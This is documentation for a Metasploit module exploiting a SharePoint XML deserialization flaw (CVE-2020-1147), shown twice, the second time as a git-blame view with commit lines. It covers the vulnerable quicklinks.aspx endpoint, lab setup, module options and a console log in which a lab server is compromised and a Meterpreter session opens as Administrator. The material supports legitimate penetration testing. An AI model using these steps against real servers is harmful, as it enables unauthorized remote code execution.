documentation/modules/exploit/windows/http/sharepoint_data_deserialization.md

## Vulnerable Application
A remotely exploitable vulnerability exists within SharePoint that can be leveraged by a remote authenticated attacker
to execute code within the context of the SharePoint application service. The privileges in this execution context are
determined by the account that is specified when SharePoint is installed and configured. The vulnerability is related to
a failure to validate the source of XML input data, leading to an unsafe deserialization operation that can be triggered
from a page that initializes either the `ContactLinksSuggestionsMicroView` type or a derivative of it. In a default
configuration, a Domain User account is sufficient to access SharePoint and exploit this vulnerability.

This module leverages the `/_layouts/15/quicklinks.aspx?Mode=Suggestion` endpoint that was confirmed to be vulnerable by
[Soroush Dalili](https://twitter.com/irsdl). Alternative endpoints that instantiate the
`ContactLinksSuggestionsMicroView` type may be used as well but are not supported by the module.

### Configuring SharePoint
Once SharePoint is installed, it needs to be configured with a site in order to be exploitable. The Central
Administration web interface **is not vulnerable**. To configure SharePoint to be a stand alone server:

1. Install Active Directory and promote the server to be a Domain Controller
    1. Install the "Active Directory Domain Services" role
    1. Promote the server to a Domain Controller in a new forest
    1. Create a Domain User account for testing
1. Install SQL Server Express
1. Run the "SharePoint Products Configuration Wizard"
    1. Use the SQL Server Express instances as the database server
1. In the SharePoint "Central Administration" console web interface:
    1. Verify that there is a web application under the "Manage web applications" page
    1. Create a new "Site Collection" under the "Create site collections" page
        1. Select the previously created web application
        1. Set a Title
        1. Use the default "Team Site" template
        1. Set the "Primary Site Collection Administrator" to the Domain Administrator account

## Verification Steps

1. Install the application and ensure a page is accessible
1. Start msfconsole
1. Do: `use exploit/windows/http/sharepoint_data_deserialization`
1. Set the `RHOSTS`, `USERNAME`, `PASSWORD` and `PAYLOAD` options
1. Set any additional options as required by the previously selected payload
1. Optionally set the `VHOST`, `SSL` and `DOMAIN` options as appropriate
1. Run the exploit

## Options

## Scenarios

### SharePoint 2016 on Server 2016

```
msf5 > use exploit/windows/http/sharepoint_data_deserialization 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/http/sharepoint_data_deserialization) > set RHOSTS 192.168.63.168
RHOSTS => 192.168.63.168
msf5 exploit(windows/http/sharepoint_data_deserialization) > set RPORT 80
RPORT => 80
msf5 exploit(windows/http/sharepoint_data_deserialization) > set SSL false
[!] Changing the SSL option's value may require changing RPORT!
SSL => false
msf5 exploit(windows/http/sharepoint_data_deserialization) > set VHOST ec2amaz-v2pri0v
VHOST => ec2amaz-v2pri0v
msf5 exploit(windows/http/sharepoint_data_deserialization) > set USERNAME smcintyre
USERNAME => smcintyre
msf5 exploit(windows/http/sharepoint_data_deserialization) > set PASSWORD Password1
PASSWORD => Password1
msf5 exploit(windows/http/sharepoint_data_deserialization) > set DOMAIN SHRPNT
DOMAIN => SHRPNT
msf5 exploit(windows/http/sharepoint_data_deserialization) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf5 exploit(windows/http/sharepoint_data_deserialization) > check
[*] 192.168.63.168:80 - The service is running, but could not be validated. Received the quicklinks HTML form.
msf5 exploit(windows/http/sharepoint_data_deserialization) > exploit

[*] Executing automatic check (disable AutoCheck to override)
[!] The service is running, but could not be validated. Received the quicklinks HTML form.
[*] Command Stager progress -   7.42% done (7499/101079 bytes)
[*] Command Stager progress -  14.84% done (14998/101079 bytes)
[*] Command Stager progress -  22.26% done (22497/101079 bytes)
[*] Command Stager progress -  29.68% done (29996/101079 bytes)
[*] Command Stager progress -  37.09% done (37495/101079 bytes)
[*] Command Stager progress -  44.51% done (44994/101079 bytes)
[*] Command Stager progress -  51.93% done (52493/101079 bytes)
[*] Command Stager progress -  59.35% done (59992/101079 bytes)
[*] Command Stager progress -  66.77% done (67491/101079 bytes)
[*] Command Stager progress -  74.19% done (74990/101079 bytes)
[*] Command Stager progress -  81.61% done (82489/101079 bytes)
[*] Command Stager progress -  89.03% done (89988/101079 bytes)
[*] Command Stager progress -  96.45% done (97487/101079 bytes)
[*] Command Stager progress - 100.00% done (101079/101079 bytes)
[*] Started bind TCP handler against 192.168.63.168:4444
[*] Sending stage (176195 bytes) to 192.168.63.168
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.63.168:4444) at 2020-07-29 11:45:13 -0400

meterpreter > sysinfo
Computer        : EC2AMAZ-V2PRI0V
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : SHRPNT
Logged On Users : 19
Meterpreter     : x86/windows
meterpreter > getuid
Server username: SHRPNT\Administrator
meterpreter >
```
Add the exploit for CVE-2020-1147 2020-07-29 11:58:38 -04:00			`## Vulnerable Application`
			`A remotely exploitable vulnerability exists within SharePoint that can be leveraged by a remote authenticated attacker`
Fix a bunch of documentation typos and minor code cleanups 2020-07-29 16:11:17 -04:00			`to execute code within the context of the SharePoint application service. The privileges in this execution context are`
			`determined by the account that is specified when SharePoint is installed and configured. The vulnerability is related to`
			`a failure to validate the source of XML input data, leading to an unsafe deserialization operation that can be triggered`
			from a page that initializes either the `ContactLinksSuggestionsMicroView` type or a derivative of it. In a default
			`configuration, a Domain User account is sufficient to access SharePoint and exploit this vulnerability.`
Add the exploit for CVE-2020-1147 2020-07-29 11:58:38 -04:00
			This module leverages the `/_layouts/15/quicklinks.aspx?Mode=Suggestion` endpoint that was confirmed to be vulnerable by
			`[Soroush Dalili](https://twitter.com/irsdl). Alternative endpoints that instantiate the`
Fix a bunch of documentation typos and minor code cleanups 2020-07-29 16:11:17 -04:00			`ContactLinksSuggestionsMicroView` type may be used as well but are not supported by the module.
Add the exploit for CVE-2020-1147 2020-07-29 11:58:38 -04:00
			`### Configuring SharePoint`
			`Once SharePoint is installed, it needs to be configured with a site in order to be exploitable. The Central`
			`Administration web interface is not vulnerable. To configure SharePoint to be a stand alone server:`

			`1. Install Active Directory and promote the server to be a Domain Controller`
			`1. Install the "Active Directory Domain Services" role`
			`1. Promote the server to a Domain Controller in a new forest`
			`1. Create a Domain User account for testing`
			`1. Install SQL Server Express`
			`1. Run the "SharePoint Products Configuration Wizard"`
			`1. Use the SQL Server Express instances as the database server`
Fix a bunch of documentation typos and minor code cleanups 2020-07-29 16:11:17 -04:00			`1. In the SharePoint "Central Administration" console web interface:`
Add the exploit for CVE-2020-1147 2020-07-29 11:58:38 -04:00			`1. Verify that there is a web application under the "Manage web applications" page`
			`1. Create a new "Site Collection" under the "Create site collections" page`
			`1. Select the previously created web application`
			`1. Set a Title`
			`1. Use the default "Team Site" template`
			`1. Set the "Primary Site Collection Administrator" to the Domain Administrator account`

			`## Verification Steps`

			`1. Install the application and ensure a page is accessible`
			`1. Start msfconsole`
			1. Do: `use exploit/windows/http/sharepoint_data_deserialization`
Fix a bunch of documentation typos and minor code cleanups 2020-07-29 16:11:17 -04:00			1. Set the `RHOSTS`, `USERNAME`, `PASSWORD` and `PAYLOAD` options
			`1. Set any additional options as required by the previously selected payload`
			1. Optionally set the `VHOST`, `SSL` and `DOMAIN` options as appropriate
Add the exploit for CVE-2020-1147 2020-07-29 11:58:38 -04:00			`1. Run the exploit`

			`## Options`

			`## Scenarios`

			`### SharePoint 2016 on Server 2016`

			```
			`msf5 > use exploit/windows/http/sharepoint_data_deserialization`
			`[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp`
			`msf5 exploit(windows/http/sharepoint_data_deserialization) > set RHOSTS 192.168.63.168`
			`RHOSTS => 192.168.63.168`
			`msf5 exploit(windows/http/sharepoint_data_deserialization) > set RPORT 80`
			`RPORT => 80`
			`msf5 exploit(windows/http/sharepoint_data_deserialization) > set SSL false`
			`[!] Changing the SSL option's value may require changing RPORT!`
			`SSL => false`
			`msf5 exploit(windows/http/sharepoint_data_deserialization) > set VHOST ec2amaz-v2pri0v`
			`VHOST => ec2amaz-v2pri0v`
			`msf5 exploit(windows/http/sharepoint_data_deserialization) > set USERNAME smcintyre`
			`USERNAME => smcintyre`
			`msf5 exploit(windows/http/sharepoint_data_deserialization) > set PASSWORD Password1`
			`PASSWORD => Password1`
			`msf5 exploit(windows/http/sharepoint_data_deserialization) > set DOMAIN SHRPNT`
			`DOMAIN => SHRPNT`
			`msf5 exploit(windows/http/sharepoint_data_deserialization) > set PAYLOAD windows/meterpreter/bind_tcp`
			`PAYLOAD => windows/meterpreter/bind_tcp`
			`msf5 exploit(windows/http/sharepoint_data_deserialization) > check`
			`[*] 192.168.63.168:80 - The service is running, but could not be validated. Received the quicklinks HTML form.`
			`msf5 exploit(windows/http/sharepoint_data_deserialization) > exploit`

			`[*] Executing automatic check (disable AutoCheck to override)`
			`[!] The service is running, but could not be validated. Received the quicklinks HTML form.`
			`[*] Command Stager progress - 7.42% done (7499/101079 bytes)`
			`[*] Command Stager progress - 14.84% done (14998/101079 bytes)`
			`[*] Command Stager progress - 22.26% done (22497/101079 bytes)`
			`[*] Command Stager progress - 29.68% done (29996/101079 bytes)`
			`[*] Command Stager progress - 37.09% done (37495/101079 bytes)`
			`[*] Command Stager progress - 44.51% done (44994/101079 bytes)`
			`[*] Command Stager progress - 51.93% done (52493/101079 bytes)`
			`[*] Command Stager progress - 59.35% done (59992/101079 bytes)`
			`[*] Command Stager progress - 66.77% done (67491/101079 bytes)`
			`[*] Command Stager progress - 74.19% done (74990/101079 bytes)`
			`[*] Command Stager progress - 81.61% done (82489/101079 bytes)`
			`[*] Command Stager progress - 89.03% done (89988/101079 bytes)`
			`[*] Command Stager progress - 96.45% done (97487/101079 bytes)`
			`[*] Command Stager progress - 100.00% done (101079/101079 bytes)`
			`[*] Started bind TCP handler against 192.168.63.168:4444`
			`[*] Sending stage (176195 bytes) to 192.168.63.168`
			`[*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.63.168:4444) at 2020-07-29 11:45:13 -0400`

			`meterpreter > sysinfo`
			`Computer : EC2AMAZ-V2PRI0V`
			`OS : Windows 2016+ (10.0 Build 14393).`
			`Architecture : x64`
			`System Language : en_US`
			`Domain : SHRPNT`
			`Logged On Users : 19`
			`Meterpreter : x86/windows`
			`meterpreter > getuid`
			`Server username: SHRPNT\Administrator`
			`meterpreter >`
			```